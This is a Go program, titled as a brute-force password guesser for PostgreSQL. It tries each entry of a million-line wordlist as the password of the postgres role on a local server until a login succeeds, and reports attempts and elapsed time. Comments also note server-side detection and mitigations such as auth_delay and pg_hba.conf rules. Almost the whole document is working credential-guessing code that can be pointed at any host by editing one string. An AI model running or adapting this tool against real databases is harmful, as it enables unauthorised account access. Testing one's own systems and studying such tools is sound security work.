Brute force password guesser for Postgres
package main
import (
"bufio"
"fmt"
"log"
"net/url"
"os"
"time"
"database/sql"
_ "github.com/lib/pq"
)
var (
	// connStr is the connection URL template. The single %s verb is where the
	// candidate password is substituted. The target is the postgres role on
	// the local instance (localhost:5432, database postgres), and
	// sslmode=disable means the connection is made without TLS.
	connStr = "postgresql://postgres:%s@localhost:5432/postgres?sslmode=disable"

	// pwFile names the wordlist, one candidate per line. The relative path is
	// resolved against the process working directory.
	pwFile = "top-1m-pw.txt"
)
// getPostgresDBConnection returns a *sql.DB handle for the given lib/pq
// connection string, using the driver registered under the name "postgres".
//
// sql.Open may only validate its arguments without contacting the server, so
// no authentication takes place here. The credentials are exercised when the
// caller uses the handle, for example through Ping.
//
// On failure it returns a nil handle and the error from sql.Open.
func getPostgresDBConnection(libPqConnString string) (*sql.DB, error) {
	handle, openErr := sql.Open("postgres", libPqConnString)
	if openErr != nil {
		return nil, openErr
	}
	return handle, nil
}
// main reads the wordlist named by pwFile line by line, substitutes each
// candidate into connStr and calls Ping to learn whether the server accepts
// it. The first candidate whose Ping succeeds is printed together with the
// attempt count and elapsed time, and the program returns. Otherwise the loop
// ends through log.Fatalf as soon as the reader returns an error, which
// includes io.EOF at the end of the file.
//
// Any Ping error counts as "no match", not only an authentication failure,
// so an unreachable server looks the same as a wrong password here.
//
// Server-side view: each rejected candidate is one failed login for the
// postgres role, issued sequentially from one client. PostgreSQL writes
// failed password authentication to its server log, which makes that log the
// natural detection point for a run like this. Core PostgreSQL has no
// failed-login lockout; the auth_delay contrib module, narrow pg_hba.conf
// rules and a password that does not appear in common wordlists are the
// relevant mitigations.
func main() {
	began := time.Now()
	lastReport := began
	tried := 0

	wordlist, err := os.OpenFile(pwFile, os.O_RDONLY, os.ModePerm)
	if err != nil {
		log.Fatalf("open file error: %v", err)
	}
	lines := bufio.NewReader(wordlist)

	for {
		// ReadString keeps the trailing '\n' in pwd. Any read error,
		// including io.EOF, terminates the program here.
		pwd, readErr := lines.ReadString('\n')
		if readErr != nil || pwd == "" {
			log.Fatalf("exiting. pwd: %s, err: %v", pwd, readErr)
		}

		// Drop the final byte (the newline) and escape the candidate as a
		// URL path so it can be embedded in the connection URL.
		escaped := (&url.URL{Path: pwd[:len(pwd)-1]}).String()
		dsn := fmt.Sprintf(connStr, escaped)

		conn, openErr := getPostgresDBConnection(dsn)
		if openErr != nil {
			log.Fatal("failed to initialize conn", openErr)
		}

		// Ping is what actually connects and authenticates.
		pingErr := conn.Ping()
		tried++
		now := time.Now()

		if pingErr == nil {
			// pwd still carries its newline when printed.
			fmt.Println("password MATCH:", pwd)
			fmt.Println("attempts:", tried)
			fmt.Println("runtime:", now.Sub(began))
			return
		}

		// Progress line at most once every ten seconds.
		if lastReport.Before(now.Add(-10 * time.Second)) {
			fmt.Println("attempts:", tried)
			fmt.Println("runtime:", now.Sub(began))
			lastReport = now
		}
	}
}